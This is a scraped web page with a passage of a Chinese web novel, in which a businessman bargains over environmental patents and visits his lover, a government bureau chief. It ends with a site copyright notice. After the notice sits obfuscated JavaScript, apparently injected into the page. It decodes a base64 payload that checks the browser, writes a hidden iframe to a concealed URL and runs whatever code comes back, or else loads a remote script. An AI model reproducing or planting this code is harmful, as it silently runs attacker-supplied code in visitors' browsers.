年的发明成果转化为实践。可他在任那会儿,从来不讲私情,不知结交官场权贵,现在好了,根本就没人给他面子。”曲鹏看见桌上摆着烟灰缸,也不问一声,就自顾自的点上一根,“我爷爷没办法了,你猜他怎么招?老家伙要把这些专利无偿捐给环保部。我爸也是个窝囊废,被我爷爷管了一辈子,自然是不敢反对了。”“但你就没他们那么傻了?”“说对了,我活了二十九年,从来就没从我爷爷那儿得过什么好儿。说出来你都不信,我堂堂部长的孙子,现在才是北京环保局一个小小的副科长。本以为等老家伙死后,我还能继承点好东西,现在要砸锅,那我还能干?死磨活磨,算是把这五个专利弄到手了。”“你的家务事我没兴趣干涉,咱们进入正题吧。”侯龙涛在他大倒苦水的时候,仔细把几份档都看过了,初步确认并不是伪造的,要想完全放心,还需要找有关部门查证。曲鹏把烟灭了,“好好,那最好。大半个月前收到你们的拒投通知,后来我就把专利送到‘中贸’拍卖行去排期了,不过你们要是改变主意了,我立刻就可以把它们撤回来。”侯龙涛听到“中贸”这个名字,不禁觉得更有把握了,“没有,我们没改变主意,还是不打算投资,至于原因,通知上已写得很清楚了。”“嗨,成心耍我啊?你这不是浪费我的时间吗?”曲鹏一听就急了。侯龙涛微微一笑,“曲先生不用上火,虽然公司没有投资的意向,但我个人对那个尾气净化装置有点兴趣,不知你有没有可能转卖给我?”曲鹏不光向iic一家投资公司发出了申请,可其他几家也已经将他拒绝了,个中缘由和iic不谋而合,所以他对与人合作建厂也不抱太大希望了。既然引资不成,转让也不是不能商量,所以才会去拍卖行排期。“你出多少?”“五十万。”“五十万?太少了,你当我这是玩具啊?”“那你开个价。”“决不能低于一百五十万,前两天刚有人愿意出三百万,我那样都没卖。”为了抬价而说谎,是完全可以理解的,编造出一个不存在的竞争对手,更是合理的策略,但一定要符合逻辑。其实侯龙涛是打算出一百万的,一百五十万也并不是完全不能接受,但从曲鹏拙劣的谎话中,知道还有压价的空间。“七十万,这是我的上限。”“那没什么可谈的了,”曲鹏站起来,“这星期三,这些专利就会公开拍卖,你要是有兴趣,可以去竞价。但我怀疑有没有那样的财力,起拍价是八十万,叫个几轮就会上百了。”藐视之情溢于言表。“曲先生,”侯龙涛叫住他,“我希望你明白一件事,虽然我并不完全认同曲老先生的处世之道,但也正是他那种人,才使共和国有今天的辉煌与成就;也正是你这种人,才让老百姓对党产生怀疑,甚至失去信心…”还没说完,曲鹏已经不耐烦的走了出去,在门没有关上时,听到他小声的骂了一句,“傻x。”侯龙涛一皱眉,从名片夹中找出了左魏的名片,“左p,晚上一起吃饭啊,有点儿关于拍卖的事儿想问问你。”放下电话,“看咱们到底谁是傻x。”…驾驶着刚抢回来的那辆本田雅阁,在踩油门的时候,已经能明显觉出马力不足。“妈的,小日本,卖给我们的车全是次品。乃乃的,还没有我在美国是那辆88年的雅阁劲儿大呢。”侯龙涛自言自语间,已把车开进了北京药检局。刚要敲施雅办公室的门,就听见里面有一个男人在说话,“妈,行行好,就三百块,别那么抠门,就在学校那边儿的游戏厅,好几个同学都等着我呢,我玩儿一会就回家。”从木门上的窗户看进去,施雅端庄的坐在办公桌后,一个让他一辈子也忘不了的油头粉面的小子正在女人身边央求着。这才想起来,刚才在停车场就觉得一辆墨绿色的丰田佳美眼熟,前挡风上贴着一个“侍魂”游戏的标志,怎么也想不起来在哪儿见过那辆车,原来是这小子在这儿。“我就让你见见你干爹。”咬牙切齿的敲了敲门。“请进。”施雅清脆的声音响起,侯龙涛推门走了进去,“施局长,下午好啊。”还没等施雅从见到这位不速之客的惊讶中回过神儿来,她儿子施小龙已经认出他了,“你来这儿干什么?”“他…他是我的一个药厂的厂长,找我来办事的。”施雅紧张的说,“小龙,给你,去玩儿吧,早点儿回家。”说着就塞给儿子几张百元的钞票。施小龙接了钱,走过侯龙涛身边时,故意用肩膀撞了他一下,很不友好的斜眼瞥了他一阵。施雅在儿子身后把门锁上,又把门上的小帘子拉上,挡住那个小窗户。回过身来,看着大模大样的坐在办公桌前长沙发上的男人,“你怎么突然来了,也不先告诉我一声,你为什么会认识我儿子?”侯龙涛并没有直接回答她的问题,“你儿子很喜欢去游戏厅吗?”“是,他最近迷上了一个叫魂什么还是什么魂一类的游戏,一放学就泡在游戏厅里,不把钱花光了不回家。”“侍魂?”“对对,你也知道?”“老游戏了,不过挺好玩儿的,你儿子玩儿得怎么样?”“据他自己说是高手,呵呵,小孩儿嘛。”施雅已经坐回了办公桌后,“你还没说是怎么认识他的呢。”“我认识他的女朋友陈倩,有一次我去找她,正好你儿子也在。”“你…你和陈倩?”施雅不是怕侯龙涛乱搞女人,她根本也管不着,只是怕儿子的女朋友还有别的男人。“我们只是普通朋友,我连他俩是怎么认识的都不知道,陈倩可比你儿子大三岁呢。”女人嘘了一口气,好像放心了,“陈倩的堂妹陈曦是小龙的同学,给陈曦过生日时认识的。其实我觉得陈曦那姑娘不错,又聪明又漂亮,可小龙被我惯坏了,只喜欢能迁就他的人。陈倩也很漂亮,还很温柔,又能像姐姐一样让着他。小龙一见她就看上了,追了六个多月才追到的。”侯龙涛点上根烟,施雅是不抽的,但桌上有一个给客人用的烟灰缸。“你看我,一说起儿子的事儿就没完了,你都听烦了吧?”“没有,怎么会呢,干儿子的事,我也想多了解一些嘛。”“你…你别胡说,”女人的脸一红,知道他是什么意思,“你有事儿吗?”“怎么,没事儿就不能来吗?想你了也不行?”“嘘…”施雅要他小声点儿,这间办公室可不是隔音的,说话的声音稍微大点儿,外面就能听见,“别闹了,真的,有什么事儿
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}